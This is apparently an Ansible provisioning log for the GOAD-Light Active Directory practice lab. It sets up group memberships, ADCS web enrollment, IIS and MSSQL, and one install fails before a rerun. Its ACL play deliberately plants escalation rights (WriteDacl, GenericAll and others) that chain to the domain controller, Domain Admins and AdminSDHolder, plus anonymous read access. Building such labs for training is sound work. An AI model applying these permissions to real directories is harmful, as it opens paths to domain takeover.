TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Adjust rights configuration] *************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: settings/adjust_rights : Add domain users to local groups on dc01]
[started TASK: settings/adjust_rights : Add domain users to local groups on dc02]
[started TASK: settings/adjust_rights : Add domain users to local groups on srv02]
TASK [settings/adjust_rights : Add domain users to local groups] *******************************************************************************************************************************************
changed: [srv02] => (item={'key': 'Administrators', 'value': ['north\\jeor.mormont']})
changed: [dc02] => (item={'key': 'Administrators', 'value': ['north\\eddard.stark', 'north\\catelyn.stark', 'north\\robb.stark']})
changed: [dc01] => (item={'key': 'Administrators', 'value': ['sevenkingdoms\\robert.baratheon', 'sevenkingdoms\\cersei.lannister', 'sevenkingdoms\\DragonRider']})
changed: [srv02] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']})
changed: [dc02] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Stark']})
changed: [dc01] => (item={'key': 'Remote Desktop Users', 'value': ['sevenkingdoms\\Small Council', 'sevenkingdoms\\Baratheon']})
[started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on dc01]
[started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on dc02]
[started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on srv02]
TASK [settings/user_rights : Add remote desktop and administrators group to rdp] ***************************************************************************************************************************
ok: [srv02]
changed: [dc02]
changed: [dc01]
PLAY [cross domain groups] *********************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
[started TASK: groups_domains : Reboot and wait for the AD system to restart on dc01]
[started TASK: groups_domains : Reboot and wait for the AD system to restart on dc02]
TASK [groups_domains : Reboot and wait for the AD system to restart] ***************************************************************************************************************************************
changed: [dc01]
changed: [dc02]
[started TASK: groups_domains : synchronizes all domains on dc01]
[started TASK: groups_domains : synchronizes all domains on dc02]
TASK [groups_domains : synchronizes all domains] ***********************************************************************************************************************************************************
changed: [dc02]
changed: [dc01]
[started TASK: groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} on dc01]
[started TASK: groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} on dc02]
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=12 changed=4 unreachable=0 failed=0 skipped=2 rescued=0 ignored=0
dc02 : ok=7 changed=4 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
srv02 : ok=4 changed=1 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : adcs.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini adcs.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [ADCS] ************************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: adcs : Install ADCS on dc01]
TASK [adcs : Install ADCS] *********************************************************************************************************************************************************************************
changed: [dc01]
[started TASK: adcs : Install-WindowsFeature ADCS-Cert-Authority on dc01]
TASK [adcs : Install-WindowsFeature ADCS-Cert-Authority] ***************************************************************************************************************************************************
ok: [dc01]
[started TASK: adcs : Install-WindowsFeature ADCS-Web-Enrollment on dc01]
TASK [adcs : Install-WindowsFeature ADCS-Web-Enrollment] ***************************************************************************************************************************************************
ok: [dc01]
[started TASK: adcs : Install-ADCSCertificationAuthority-PS on dc01]
TASK [adcs : Install-ADCSCertificationAuthority-PS] ********************************************************************************************************************************************************
changed: [dc01]
[started TASK: adcs : Enable Web enrollement on dc01]
TASK [adcs : Enable Web enrollement] ***********************************************************************************************************************************************************************
changed: [dc01]
[started TASK: adcs : Refresh on dc01]
TASK [adcs : Refresh] **************************************************************************************************************************************************************************************
changed: [dc01]
PLAY [ADCS] ************************************************************************************************************************************************************************************************
skipping: no hosts matched
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=13 changed=4 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : ad-acl.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-acl.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [ACL inside AD] ***************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
[started TASK: acl : set acl on dc01]
[started TASK: acl : set acl on dc02]
TASK [acl : set acl] ***************************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'forcechangepassword_tywin_jaime', 'value': {'for': 'tywin.lannister', 'to': 'jaime.lannister', 'right': 'Ext-User-Force-Change-Password', 'inheritance': 'None'}})
changed: [dc02] => (item={'key': 'anonymous_rpc', 'value': {'for': 'NT AUTHORITY\\ANONYMOUS LOGON', 'to': 'DC=North,DC=sevenkingdoms,DC=local', 'right': 'ReadProperty', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'GenericWrite_on_user_jaimie_joffrey', 'value': {'for': 'jaime.lannister', 'to': 'joffrey.baratheon', 'right': 'GenericWrite', 'inheritance': 'None'}})
changed: [dc02] => (item={'key': 'anonymous_rpc2', 'value': {'for': 'NT AUTHORITY\\ANONYMOUS LOGON', 'to': 'DC=North,DC=sevenkingdoms,DC=local', 'right': 'GenericExecute', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'Writedacl_joffrey_tyron', 'value': {'for': 'joffrey.baratheon', 'to': 'tyron.lannister', 'right': 'WriteDacl', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'self-self-membership-on-group_tyron_small_council', 'value': {'for': 'tyron.lannister', 'to': 'Small Council', 'right': 'Ext-Self-Self-Membership', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'addmember_smallcouncil_DragonStone', 'value': {'for': 'Small Council', 'to': 'DragonStone', 'right': 'Ext-Write-Self-Membership', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'write_owner_dragonstone_kingsguard', 'value': {'for': 'DragonStone', 'to': 'KingsGuard', 'right': 'WriteOwner', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_kingsguard_stanis', 'value': {'for': 'KingsGuard', 'to': 'stannis.baratheon', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_stanis_dc', 'value': {'for': 'stannis.baratheon', 'to': 'kingslanding$', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_group_acrrosdom_dc', 'value': {'for': 'AcrossTheNarrowSea', 'to': 'kingslanding$', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_varys_domadmin', 'value': {'for': 'lord.varys', 'to': 'Domain Admins', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_varys_domadmin_holder', 'value': {'for': 'lord.varys', 'to': 'CN=AdminSDHolder,CN=System,DC=sevenkingdoms,DC=local', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'WriteDACL_renly_Crownlands', 'value': {'for': 'renly.baratheon', 'to': 'OU=Crownlands,DC=sevenkingdoms,DC=local', 'right': 'WriteDacl', 'inheritance': 'None'}})
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=8 changed=1 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=3 changed=1 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : servers.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [srv02]
ok: [dc01]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Install IIS] *****************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Enable update service on srv02]
TASK [iis : Enable update service] *************************************************************************************************************************************************************************
changed: [srv02]
[started TASK: iis : Install IIS Management Features on srv02]
TASK [iis : Install IIS Management Features] ***************************************************************************************************************************************************************
changed: [srv02]
[started TASK: iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components) on srv02]
TASK [iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components)] *******************************************************************************************************
changed: [srv02]
[started TASK: iis : Install IIS 6 Compatibility Features on srv02]
TASK [iis : Install IIS 6 Compatibility Features] **********************************************************************************************************************************************************
changed: [srv02]
[started TASK: iis : Install IIS Web-Server with sub features and management tools on srv02]
TASK [iis : Install IIS Web-Server with sub features and management tools] *********************************************************************************************************************************
changed: [srv02]
[started TASK: iis : Create directory on srv02]
TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Create directory on srv02]
TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : default-website-index on srv02]
TASK [iis : default-website-index] *************************************************************************************************************************************************************************
changed: [srv02]
[started TASK: iis : Reboot if installing Web-Server feature requires it on srv02]
PLAY [Install MSSQL Express] *******************************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Reboot before install (long timeout in case of update) on srv02]
TASK [mssql : Reboot before install (long timeout in case of update)] **************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Set download_url on srv02]
TASK [mssql : Set download_url] ****************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Set connection method on srv02]
TASK [mssql : Set connection method] ***********************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Set mssql_service_instance on srv02]
TASK [mssql : Set mssql_service_instance] ******************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Set mssql_service_name on srv02]
TASK [mssql : Set mssql_service_name] **********************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Display mssql variables in use on srv02]
TASK [mssql : Display mssql variables in use] **************************************************************************************************************************************************************
ok: [srv02] => {
"msg": [
"MSSQL version : MSSQL_2019",
"MSSQL service name : MSSQL$SQLEXPRESS",
"MSSQL download url : https://download.microsoft.com/download/7/f/8/7f8a9c43-8c8a-4f7c-9f92-83c18d96b681/SQL2019-SSEI-Expr.exe",
"MSSQL instance : SQLEXPRESS",
"MSSQL connection use : -E"
]
}
[started TASK: mssql : create a directory for installer download on srv02]
TASK [mssql : create a directory for installer download] ***************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : create a directory for installer extraction on srv02]
TASK [mssql : create a directory for installer extraction] *************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : create a directory for media extraction on srv02]
TASK [mssql : create a directory for media extraction] *****************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : create the configuration file on srv02]
TASK [mssql : create the configuration file] ***************************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : check downloaded file exists on srv02]
TASK [mssql : check downloaded file exists] ****************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : get the installer on srv02]
TASK [mssql : get the installer] ***************************************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Add service account to Log on as a service on srv02]
TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : check MSSQL service already exist (if failed service do not exist, launch install) on srv02]
TASK [mssql : check MSSQL service already exist (if failed service do not exist, launch install)] **********************************************************************************************************
ok: [srv02]
[started TASK: mssql : debug on srv02]
TASK [mssql : debug] ***************************************************************************************************************************************************************************************
ok: [srv02] => {
"msg": {
"changed": false,
"exists": false,
"failed": false,
"failed_when_result": false
}
}
[started TASK: mssql : Install the database on srv02]
FAILED - RETRYING: [srv02]: Install the database (3 retries left).
FAILED - RETRYING: [srv02]: Install the database (2 retries left).
FAILED - RETRYING: [srv02]: Install the database (1 retries left).
TASK [mssql : Install the database] ************************************************************************************************************************************************************************
fatal: [srv02]: FAILED! => {"attempts": 3, "changed": true, "cmd": "c:\\setup\\mssql\\sql_installer.exe /configurationfile=c:\\setup\\mssql\\sql_conf.ini /IACCEPTSQLSERVERLICENSETERMS /MEDIAPATH=c:\\setup\\mssql\\media /QUIET /HIDEPROGRESSBAR", "delta": "0:00:35.187290", "end": "2026-02-12 16:17:02.429965", "msg": "non-zero return code", "rc": 2226323458, "start": "2026-02-12 16:16:27.242675", "stderr": "", "stderr_lines": [], "stdout": "Microsoft (R) SQL Server Installer\r\nCopyright (c) 2019 Microsoft. All rights reserved.\r\n\r\nDownloading install package...\r\n\r\n\r\nOperation finished with result: Failure\r\n\r\nOops...\r\n\r\nUnable to install SQL Server (setup.exe).\r\n\r\n Exit code (Decimal): -2068643838\r\n Exit message: No features were installed during the setup execution. The requested features may already be installed. Please review the summary.txt log for further details.\r\n\r\n SQL SERVER INSTALL LOG FOLDER\r\n c:\\Program Files\\Microsoft SQL Server\\150\\Setup Bootstrap\\Log\\20260212_081633\r\n\r\n", "stdout_lines": ["Microsoft (R) SQL Server Installer", "Copyright (c) 2019 Microsoft. All rights reserved.", "", "Downloading install package...", "", "", "Operation finished with result: Failure", "", "Oops...", "", "Unable to install SQL Server (setup.exe).", "", " Exit code (Decimal): -2068643838", " Exit message: No features were installed during the setup execution. The requested features may already be installed. Please review the summary.txt log for further details.", "", " SQL SERVER INSTALL LOG FOLDER", " c:\\Program Files\\Microsoft SQL Server\\150\\Setup Bootstrap\\Log\\20260212_081633", ""]}
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=6 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=26 changed=13 unreachable=0 failed=1 skipped=1 rescued=0 ignored=0
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Install IIS] *****************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Enable update service on srv02]
TASK [iis : Enable update service] *************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Install IIS Management Features on srv02]
TASK [iis : Install IIS Management Features] ***************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components) on srv02]
TASK [iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components)] *******************************************************************************************************
ok: [srv02]
[started TASK: iis : Install IIS 6 Compatibility Features on srv02]
TASK [iis : Install IIS 6 Compatibility Features] **********************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Install IIS Web-Server with sub features and management tools on srv02]
TASK [iis : Install IIS Web-Server with sub features and management tools] *********************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Create directory on srv02]
TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Create directory on srv02]
TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : default-website-index on srv02]
TASK [iis : default-website-index] *************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: iis : Reboot if installing Web-Server feature requires it on srv02]
PLAY [Install MSSQL Express] *******************************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Reboot before install (long timeout in case of update) on srv02]
TASK [mssql : Reboot before install (long timeout in case of update)] **************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Set download_url on srv02]
TASK [mssql : Set download_url] ****************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Set connection method on srv02]
TASK [mssql : Set connection method] ***********************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Set mssql_service_instance on srv02]
TASK [mssql : Set mssql_service_instance] ******************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Set mssql_service_name on srv02]
TASK [mssql : Set mssql_service_name] **********************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : Display mssql variables in use on srv02]
TASK [mssql : Display mssql variables in use] **************************************************************************************************************************************************************
ok: [srv02] => {
"msg": [
"MSSQL version : MSSQL_2019",
"MSSQL service name : MSSQL$SQLEXPRESS",
"MSSQL download url : https://download.microsoft.com/download/7/f/8/7f8a9c43-8c8a-4f7c-9f92-83c18d96b681/SQL2019-SSEI-Expr.exe",
"MSSQL instance : SQLEXPRESS",
"MSSQL connection use : -E"
]
}
[started TASK: mssql : create a directory for installer download on srv02]
TASK [mssql : create a directory for installer download] ***************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : create a directory for installer extraction on srv02]
TASK [mssql : create a directory for installer extraction] *************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : create a directory for media extraction on srv02]
TASK [mssql : create a directory for media extraction] *****************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : create the configuration file on srv02]
TASK [mssql : create the configuration file] ***************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : check downloaded file exists on srv02]
TASK [mssql : check downloaded file exists] ****************************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : get the installer on srv02]
[started TASK: mssql : Add service account to Log on as a service on srv02]
TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************************************
ok: [srv02]
[started TASK: mssql : check MSSQL service already exist (if failed service do not exist, launch install) on srv02]
TASK [mssql : check MSSQL service already exist (if failed service do not exist, launch install)] **********************************************************************************************************
ok: [srv02]
[started TASK: mssql : debug on srv02]
TASK [mssql : debug] ***************************************************************************************************************************************************************************************
ok: [srv02] => {
"msg": {
"can_pause_and_continue": true,
"changed": false,
"depended_by": [
"SQLAgent$SQLEXPRESS"
],
"dependencies": [
"KEYISO"
],
"description": "Provides storage, processing and controlled access of data, and rapid transaction processing.",
"desktop_interact": false,
"display_name": "SQL Server (SQLEXPRESS)",
"exists": true,
"failed": false,
"failed_when_result": false,
"name": "MSSQL$SQLEXPRESS",
"path": "\"c:\\Program Files\\Microsoft SQL Server\\MSSQL15.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS",
"start_mode": "auto",
"state": "running",
"username": "north.sevenkingdoms.local\\sql_svc"
}
}
[started TASK: mssql : Install the database on srv02]
[started TASK: mssql : Add or update registry for ip port on srv02]
[started TASK: mssql : Add or update registry for ip port on srv02]
TASK [mssql : Add or update registry for ip port] **********************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Reboot on srv02]
TASK [mssql : Reboot] **************************************************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Firewall | Allow MSSQL through Firewall on srv02]
TASK [mssql : Firewall | Allow MSSQL through Firewall] *****************************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Firewall | Allow MSSQL discover through Firewall on srv02]
TASK [mssql : Firewall | Allow MSSQL discover through Firewall] ********************************************************************************************************************************************
changed: [srv02]
[started TASK: mssql : Be sure service is started on srv02]
TASK [mssql : Be sure service is started] ******************************************************************************************************************************************************************
ok: [srv02]
